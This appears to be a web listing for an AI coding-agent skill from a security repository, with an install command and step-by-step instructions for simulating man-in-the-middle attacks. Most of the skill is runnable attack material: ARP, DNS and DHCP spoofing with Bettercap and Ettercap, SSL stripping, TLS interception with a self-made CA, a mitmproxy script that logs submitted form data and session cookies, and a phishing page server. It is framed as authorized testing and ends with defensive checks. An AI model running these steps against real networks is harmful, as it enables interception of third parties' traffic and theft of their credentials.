acquiring-disk-image-w…
Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through
Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept,
$ npx -y skills add Mikaru0Mystic/sectinel --skill conducting-man-in-the-middle-attack-simulation --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/conducting-man-in-the-middle-attack-simulationContext preview
The summary Claude sees to decide when to auto-load this skill.
Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept,
name: conducting-man-in-the-middle-attack-simulation description: 'Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities. ' domain: cybersecurity subdomain: network-security tags: - network-security - mitm - bettercap - ettercap - mitmproxy version: '1.0' author: mahipal license: Apache-2.0 nist_csf: - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02
**Do not use** on production networks without explicit written authorization and a rollback plan, against systems you do not own or have permission to test, or for intercepting communications of uninvolved third parties.
# Enable IP forwarding sudo sysctl -w net.ipv4.ip_forward=1 sudo sysctl -w net.ipv6.conf.all.forwarding=1 # Disable ICMP redirects sudo sysctl -w net.ipv4.conf.all.send_redirects=0 # Generate a CA certificate for TLS interception openssl genrsa -out mitm-ca.key 4096 openssl req -new -x509 -days 30 -key mitm-ca.key -out mitm-ca.crt \ -subj "/CN=MITM Test CA/O=Security Assessment/C=US" # Discover hosts on the target network sudo bettercap -iface eth0 -eval "net.probe on; sleep 10; net.show; quit"
# Start Bettercap with interactive mode sudo bettercap -iface eth0 # Enable network probing to discover hosts > net.probe on # Display discovered hosts > net.show # Set target (victim: 192.168.1.50, gateway: 192.168.1.1) > set arp.spoof.targets 192.168.1.50 > set arp.spoof.fullduplex true # Start ARP spoofing > arp.spoof on # Enable HTTP proxy for traffic inspection > set http.proxy.sslstrip true > http.proxy on # Enable HTTPS proxy with certificate interception > set https.proxy.certificate mitm-ca.crt > set https.proxy.key mitm-ca.key > https.proxy on # Enable DNS spoofing for specific domains > set dns.spoof.domains example.com,*.example.com > set dns.spoof.address 192.168.1.99 > dns.spoof on # Enable credential sniffer > set net.sniff.verbose true > set net.sniff.filter "tcp port 80 or tcp port 21 or tcp port 110" > net.sniff on
# Start mitmproxy as transparent proxy
sudo mitmproxy --mode transparent --set confdir=~/.mitmproxy \
--set ssl_insecure=true -w mitm_capture.flow
# Configure iptables to redirect traffic through mitmproxy
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
# Use mitmproxy scripting for automated credential extraction
cat > extract_creds.py << 'PYEOF'
"""mitmproxy script to extract credentials from intercepted traffic."""
from mitmproxy import http
import json
def request(flow: http.HTTPFlow):
if flow.request.method == "POST":
content_type = flow.request.headers.get("content-type", "")
if "form" in content_type or "json" in content_type:
with open("captured_forms.log", "a") as f:
f.write(f"URL: {flow.request.pretty_url}\n")
f.write(f"Data: {flow.request.get_text()}\n")
f.write("---\n")
def response(flow: http.HTTPFlow):
# Log authentication cookies
if "set-cookie" in flow.response.headers:
with open("captured_cookies.log", "a") as f:
f.write(f"URL: {flow.request.pretty_url}\n")
f.write(f"Cookie: {flow.response.headers['set-cookie']}\n")
f.write("---\n")
PYEOF
sudo mitmproxy --mode transparent -s extract_creds.py -w mitm_capture.flow# DNS spoofing with Ettercap sudo tee /etc/ettercap/etter.dns << 'EOF' # Redirect target domain to attacker's web server example.com A 192.168.1.99 *.example.com A 192.168.1.99 www.example.com A 192.168.1.99 EOF sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof /192.168.1.50// /192.168.1.1// # DHCP spoofing with Bettercap (offer rogue DHCP with attacker as gateway) sudo bettercap -iface eth0 > set dhcp6.spoof.domains example.com > dhcp6.spoof on # Set up a phishing page on the attacker machine sudo python3 -m http.server 80 --directory /var/www/phishing/
# Verify certificate pinning is working on the target application # If the app rejects the MITM CA, certificate pinning is effective # Check the target machine for certificate errors # Test HSTS enforcement # If browser refuses HTTP connection after initial HTTPS, HSTS is working curl -v -k -L http://example.com 2>&1 | grep -i "strict-transport-security" # Verify IDS detection of ARP spoofing # Check Snort/Suricata alerts for ARP anomalies grep -i "arp" /var/log/snort/alert_fast.txt # Check if
Open-source security arsenal for AI coding agents: 784 cybersecurity skills, scanner integrations, and a security MCP for Claude Code, Cursor, opencode, Gemini CLI, Cline, and any agentskills.io agent. Mapped to OWASP, MITRE ATT&CK, NIST CSF, D3FEND, ATLAS.
Repo: Mikaru0Mystic/sectinel
Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through
Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and
Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source
Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect BOLA/IDOR attacks, rate limit bypass,
Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps
Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query to detect suspicious administrative